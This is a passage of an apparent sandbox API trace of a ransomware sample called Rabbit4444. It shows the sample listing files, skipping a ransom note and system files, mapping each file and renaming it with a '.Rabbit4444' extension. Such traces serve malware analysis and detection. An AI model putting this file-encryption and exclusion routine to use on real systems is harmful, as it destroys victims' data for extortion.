(in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15044702352) returned 1 [0059.136] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0059.136] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0059.136] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.136] CloseHandle (hObject=0x298) returned 1 [0059.137] CloseHandle (hObject=0x278) returned 1 [0059.137] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8bb27ec5-5cb3-4781-baee-3439df4806e4}.settingcontent-ms.Rabbit4444") returned 192 [0059.137] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8bb27ec5-5cb3-4781-baee-3439df4806e4}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{8bb27ec5-5cb3-4781-baee-3439df4806e4}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8bb27ec5-5cb3-4781-baee-3439df4806e4}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{8bb27ec5-5cb3-4781-baee-3439df4806e4}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.137] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x534e4ad5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x534e4ad5, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2311185c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x52d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{8D58F804-9520-4208-A527-7C2B6CB77B33}.settingcontent-ms", cAlternateFileName="CL5134~1.SET")) returned 1 [0059.138] lstrcmpiW (lpString1="Classic_{8D58F804-9520-4208-A527-7C2B6CB77B33}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.138] lstrcmpiW (lpString1="Classic_{8D58F804-9520-4208-A527-7C2B6CB77B33}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.138] lstrcmpiW (lpString1="Classic_{8D58F804-9520-4208-A527-7C2B6CB77B33}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.138] lstrcmpiW (lpString1="Classic_{8D58F804-9520-4208-A527-7C2B6CB77B33}.settingcontent-ms", lpString2=".") returned 1 [0059.138] lstrcmpiW (lpString1="Classic_{8D58F804-9520-4208-A527-7C2B6CB77B33}.settingcontent-ms", lpString2="..") returned 1 [0059.138] lstrcmpiW (lpString1="Classic_{8D58F804-9520-4208-A527-7C2B6CB77B33}.settingcontent-ms", lpString2="windows") returned -1 [0059.138] lstrcmpiW (lpString1="Classic_{8D58F804-9520-4208-A527-7C2B6CB77B33}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.138] lstrcmpiW (lpString1="Classic_{8D58F804-9520-4208-A527-7C2B6CB77B33}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.138] lstrcmpiW (lpString1="Classic_{8D58F804-9520-4208-A527-7C2B6CB77B33}.settingcontent-ms", lpString2="boot") returned 1 [0059.138] lstrcmpiW (lpString1="Classic_{8D58F804-9520-4208-A527-7C2B6CB77B33}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.138] lstrcmpiW (lpString1="Classic_{8D58F804-9520-4208-A527-7C2B6CB77B33}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.138] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{8D58F804-9520-4208-A527-7C2B6CB77B33}.settingcontent-ms" | out: lpString1="Classic_{8D58F804-9520-4208-A527-7C2B6CB77B33}.settingcontent-ms") returned="Classic_{8D58F804-9520-4208-A527-7C2B6CB77B33}.settingcontent-ms" [0059.138] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8D58F804-9520-4208-A527-7C2B6CB77B33}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.138] lstrlenW (lpString="Classic_{8D58F804-9520-4208-A527-7C2B6CB77B33}.settingcontent-ms") returned 64 [0059.138] lstrlenW (lpString="Rabbit4444") returned 10 [0059.138] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.138] lstrlenW (lpString=".dll") returned 4 [0059.138] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.138] lstrlenW (lpString=".lnk") returned 4 [0059.138] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.138] lstrlenW (lpString=".ini") returned 4 [0059.138] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.138] lstrlenW (lpString=".sys") returned 4 [0059.138] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.138] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8D58F804-9520-4208-A527-7C2B6CB77B33}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{8d58f804-9520-4208-a527-7c2b6cb77b33}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.139] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.139] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15044950501) returned 1 [0059.139] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1325) returned 1 [0059.139] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0059.139] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1018d0 [0059.139] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x830, lpName=0x0) returned 0x298 [0059.143] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x830) returned 0x70000 [0059.143] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.143] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0059.143] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.144] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0059.144] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.144] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0059.144] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.144] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0059.144] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15045466733) returned 1 [0059.144] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0059.144] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1018d0 | out: hHeap=0xe0000) returned 1 [0059.144] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.144] CloseHandle (hObject=0x298) returned 1 [0059.144] CloseHandle (hObject=0x278) returned 1 [0059.144] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8D58F804-9520-4208-A527-7C2B6CB77B33}.settingcontent-ms.Rabbit4444") returned 192 [0059.144] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8D58F804-9520-4208-A527-7C2B6CB77B33}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{8d58f804-9520-4208-a527-7c2b6cb77b33}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8D58F804-9520-4208-A527-7C2B6CB77B33}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{8d58f804-9520-4208-a527-7c2b6cb77b33}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.145] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5357d444, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5357d444, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2328efd5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x406, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{8E0C279D-0BD1-43C3-9EBD-31C3DC5B8A77}.settingcontent-ms", cAlternateFileName="CL281B~1.SET")) returned 1 [0059.145] lstrcmpiW (lpString1="Classic_{8E0C279D-0BD1-43C3-9EBD-31C3DC5B8A77}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.145] lstrcmpiW (lpString1="Classic_{8E0C279D-0BD1-43C3-9EBD-31C3DC5B8A77}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.145] lstrcmpiW (lpString1="Classic_{8E0C279D-0BD1-43C3-9EBD-31C3DC5B8A77}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.145] lstrcmpiW (lpString1="Classic_{8E0C279D-0BD1-43C3-9EBD-31C3DC5B8A77}.settingcontent-ms", lpString2=".") returned 1 [0059.145] lstrcmpiW (lpString1="Classic_{8E0C279D-0BD1-43C3-9EBD-31C3DC5B8A77}.settingcontent-ms", lpString2="..") returned 1 [0059.145] lstrcmpiW (lpString1="Classic_{8E0C279D-0BD1-43C3-9EBD-31C3DC5B8A77}.settingcontent-ms", lpString2="windows") returned -1 [0059.145] lstrcmpiW (lpString1="Classic_{8E0C279D-0BD1-43C3-9EBD-31C3DC5B8A77}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.145] lstrcmpiW (lpString1="Classic_{8E0C279D-0BD1-43C3-9EBD-31C3DC5B8A77}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.145] lstrcmpiW (lpString1="Classic_{8E0C279D-0BD1-43C3-9EBD-31C3DC5B8A77}.settingcontent-ms", lpString2="boot") returned 1 [0059.145] lstrcmpiW (lpString1="Classic_{8E0C279D-0BD1-43C3-9EBD-31C3DC5B8A77}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.146] lstrcmpiW (lpString1="Classic_{8E0C279D-0BD1-43C3-9EBD-31C3DC5B8A77}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.146] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{8E0C279D-0BD1-43C3-9EBD-31C3DC5B8A77}.settingcontent-ms" | out: lpString1="Classic_{8E0C279D-0BD1-43C3-9EBD-31C3DC5B8A77}.settingcontent-ms") returned="Classic_{8E0C279D-0BD1-43C3-9EBD-31C3DC5B8A77}.settingcontent-ms" [0059.146] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8E0C279D-0BD1-43C3-9EBD-31C3DC5B8A77}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.146] lstrlenW (lpString="Classic_{8E0C279D-0BD1-43C3-9EBD-31C3DC5B8A77}.settingcontent-ms") returned 64 [0059.146] lstrlenW (lpString="Rabbit4444") returned 10 [0059.146] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.146] lstrlenW (lpString=".dll") returned 4 [0059.146] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.146] lstrlenW (lpString=".lnk") returned 4 [0059.146] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.146] lstrlenW (lpString=".ini") returned 4 [0059.146] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.146] lstrlenW (lpString=".sys") returned 4 [0059.146] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.146] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8E0C279D-0BD1-43C3-9EBD-31C3DC5B8A77}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{8e0c279d-0bd1-43c3-9ebd-31c3dc5b8a77}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.146] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.146] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15045724456) returned 1 [0059.147] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1030) returned 1 [0059.147] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0059.147] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0059.147] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x710, lpName=0x0) returned 0x298 [0059.148] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x710) returned 0x70000 [0059.149] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.149] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0059.149] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.149] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0059.149] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.149] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0059.149] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.149] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0059.149] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15045979094) returned 1 [0059.149] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0059.149] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0059.149] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.149] CloseHandle (hObject=0x298) returned 1 [0059.149] CloseHandle (hObject=0x278) returned 1 [0059.149] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8E0C279D-0BD1-43C3-9EBD-31C3DC5B8A77}.settingcontent-ms.Rabbit4444") returned 192 [0059.149] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8E0C279D-0BD1-43C3-9EBD-31C3DC5B8A77}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{8e0c279d-0bd1-43c3-9ebd-31c3dc5b8a77}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8E0C279D-0BD1-43C3-9EBD-31C3DC5B8A77}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{8e0c279d-0bd1-43c3-9ebd-31c3dc5b8a77}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.151] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53615ddb, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x53615ddb, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x222c36c3, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x401, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{8E21794E-9303-44C5-A493-C3DC53C0E463}.settingcontent-ms", cAlternateFileName="CL139A~1.SET")) returned 1 [0059.151] lstrcmpiW (lpString1="Classic_{8E21794E-9303-44C5-A493-C3DC53C0E463}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.151] lstrcmpiW (lpString1="Classic_{8E21794E-9303-44C5-A493-C3DC53C0E463}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.151] lstrcmpiW (lpString1="Classic_{8E21794E-9303-44C5-A493-C3DC53C0E463}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.151] lstrcmpiW (lpString1="Classic_{8E21794E-9303-44C5-A493-C3DC53C0E463}.settingcontent-ms", lpString2=".") returned 1 [0059.151] lstrcmpiW (lpString1="Classic_{8E21794E-9303-44C5-A493-C3DC53C0E463}.settingcontent-ms", lpString2="..") returned 1 [0059.151] lstrcmpiW (lpString1="Classic_{8E21794E-9303-44C5-A493-C3DC53C0E463}.settingcontent-ms", lpString2="windows") returned -1 [0059.151] lstrcmpiW (lpString1="Classic_{8E21794E-9303-44C5-A493-C3DC53C0E463}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.151] lstrcmpiW (lpString1="Classic_{8E21794E-9303-44C5-A493-C3DC53C0E463}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.151] lstrcmpiW (lpString1="Classic_{8E21794E-9303-44C5-A493-C3DC53C0E463}.settingcontent-ms", lpString2="boot") returned 1 [0059.151] lstrcmpiW (lpString1="Classic_{8E21794E-9303-44C5-A493-C3DC53C0E463}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.151] lstrcmpiW (lpString1="Classic_{8E21794E-9303-44C5-A493-C3DC53C0E463}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.151] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{8E21794E-9303-44C5-A493-C3DC53C0E463}.settingcontent-ms" | out: lpString1="Classic_{8E21794E-9303-44C5-A493-C3DC53C0E463}.settingcontent-ms") returned="Classic_{8E21794E-9303-44C5-A493-C3DC53C0E463}.settingcontent-ms" [0059.151] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8E21794E-9303-44C5-A493-C3DC53C0E463}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.151] lstrlenW (lpString="Classic_{8E21794E-9303-44C5-A493-C3DC53C0E463}.settingcontent-ms") returned 64 [0059.151] lstrlenW (lpString="Rabbit4444") returned 10 [0059.151] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.151] lstrlenW (lpString=".dll") returned 4 [0059.151] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.151] lstrlenW (lpString=".lnk") returned 4 [0059.151] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.151] lstrlenW (lpString=".ini") returned 4 [0059.151] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.151] lstrlenW (lpString=".sys") returned 4 [0059.151] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.151] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8E21794E-9303-44C5-A493-C3DC53C0E463}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{8e21794e-9303-44c5-a493-c3dc53c0e463}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.152] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.152] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15046252540) returned 1 [0059.152] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1025) returned 1 [0059.152] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0059.152] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0059.152] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x710, lpName=0x0) returned 0x298 [0059.153] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x710) returned 0x70000 [0059.154] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.154] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0059.154] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.154] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0059.154] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.154] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0059.154] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.154] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0059.154] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15046508493) returned 1 [0059.154] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0059.154] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0059.154] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.155] CloseHandle (hObject=0x298) returned 1 [0059.155] CloseHandle (hObject=0x278) returned 1 [0059.155] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8E21794E-9303-44C5-A493-C3DC53C0E463}.settingcontent-ms.Rabbit4444") returned 192 [0059.155] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8E21794E-9303-44C5-A493-C3DC53C0E463}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{8e21794e-9303-44c5-a493-c3dc53c0e463}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8E21794E-9303-44C5-A493-C3DC53C0E463}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{8e21794e-9303-44c5-a493-c3dc53c0e463}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.156] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x537dfa52, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x537dfa52, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2315dd0d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x350, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{8e908fc9-becc-40f6-915b-f4ca0e70d03d}.settingcontent-ms", cAlternateFileName="CL4EDB~1.SET")) returned 1 [0059.156] lstrcmpiW (lpString1="Classic_{8e908fc9-becc-40f6-915b-f4ca0e70d03d}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.156] lstrcmpiW (lpString1="Classic_{8e908fc9-becc-40f6-915b-f4ca0e70d03d}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.156] lstrcmpiW (lpString1="Classic_{8e908fc9-becc-40f6-915b-f4ca0e70d03d}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.156] lstrcmpiW (lpString1="Classic_{8e908fc9-becc-40f6-915b-f4ca0e70d03d}.settingcontent-ms", lpString2=".") returned 1 [0059.156] lstrcmpiW (lpString1="Classic_{8e908fc9-becc-40f6-915b-f4ca0e70d03d}.settingcontent-ms", lpString2="..") returned 1 [0059.156] lstrcmpiW (lpString1="Classic_{8e908fc9-becc-40f6-915b-f4ca0e70d03d}.settingcontent-ms", lpString2="windows") returned -1 [0059.156] lstrcmpiW (lpString1="Classic_{8e908fc9-becc-40f6-915b-f4ca0e70d03d}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.156] lstrcmpiW 